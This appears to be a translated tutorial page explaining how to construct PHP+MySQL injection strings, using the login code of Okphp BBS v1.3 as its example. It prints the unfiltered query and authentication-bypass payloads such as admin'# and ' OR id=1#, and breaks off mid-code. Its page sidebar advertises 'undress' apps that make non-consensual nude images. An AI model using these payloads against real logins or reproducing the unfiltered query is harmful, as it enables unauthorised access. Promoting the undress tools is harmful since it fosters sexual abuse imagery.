Home php教程 PHP开发 Talking about php+mysql injection statement structure

Talking about php+mysql injection statement structure

Nov 28, 2016 pm 04:23 PM

1. Foreword:

Version information: Okphp BBS v1.3 Open Source Edition

Download address: http://www.cncode.com/SoftView.asp?SoftID=1800

Due to the differences between PHP and MYSQL, PHP +MYSQL injection is more difficult than asp, especially the construction of statements during injection. This article mainly uses a simple analysis of some files of Okphp BBS v1.3 to talk about the construction method of php+mysql injection statements. I hope this article It will be of some help to you.

Statement: All the "vulnerabilities" mentioned in the article have not been tested and may not exist at all. In fact, it does not matter whether there are loopholes or not. What is important is the analysis ideas and statement structure.

  2. "Vulnerability" analysis:

1. Admin/login.php injection leads to authentication bypass vulnerability:

Code:

$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);

 $password = md5($password);

 $q = "select id,group_id from $user_table where username='$username' and password='$password'";

 $res = sql_query($q, $conn);

 $row = sql_fetch_row($res);

 $q = "select id,group_id from $user_table where username='$username' and password='$password'" in

 $username and $ The password is not filtered and can be easily bypassed.

  Methods for modifying statements like select * from $user_table where username='$username' and password='$password' are:

  Construction 1 (using logical operations): $username=' OR 'a'=' a $password=' OR 'a'='a

Equivalent to sql statement:

Select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'=' a'

 Construction 2 (use the comment statement # in mysql, /* to comment out $password): $username=admin'#(or admin'/*)

 That is:

 select * from $user_table where username ='admin'#' and password='$password'"

  Equivalent to:

  select * from $user_table where username='admin'

  The $password in the $q statement in admin/login.php is in the query md5 encryption was performed before, so it cannot be bypassed by the statement in construct 1. Here we use construct 2:

 select id, group_id from $user_table where username='admin'#' and password='$password'"

Equivalent to:

  select id, group_id from $user_table where username='admin'

  This is true as long as there is a user named admin. If you don't know the user name, you only know the corresponding id,

 We can construct it like this: $username=' OR id=1#

  Equivalent to:

  select id,group_id from $user_table where username='' OR id=1# and password='$password' (the ones after # are commented out)

Let’s continue looking at the code:

 if ($row[0]) {

  // If not admin or super moderator

 if ($username != "admin" && !eregi("(^|&)3 ($|&)",$row[1])) {

 $login = 0;

 }

  else {

 $login = 1;

 }

 }

  // Fail to login- ---------------

 if (!$login) {

 write_log("Moderator login","0","password wrong");

 echo "


Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
1 months ago By 尊渡假赌尊渡假赌尊渡假赌
Two Point Museum: All Exhibits And Where To Find Them
1 months ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)